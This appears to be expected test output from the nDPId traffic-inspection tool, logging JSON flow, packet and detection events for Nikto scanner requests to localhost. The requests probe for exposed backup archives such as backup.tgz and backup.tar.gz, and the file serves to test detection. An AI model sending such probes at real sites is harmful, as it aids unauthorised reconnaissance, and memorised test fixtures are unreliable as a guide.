+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 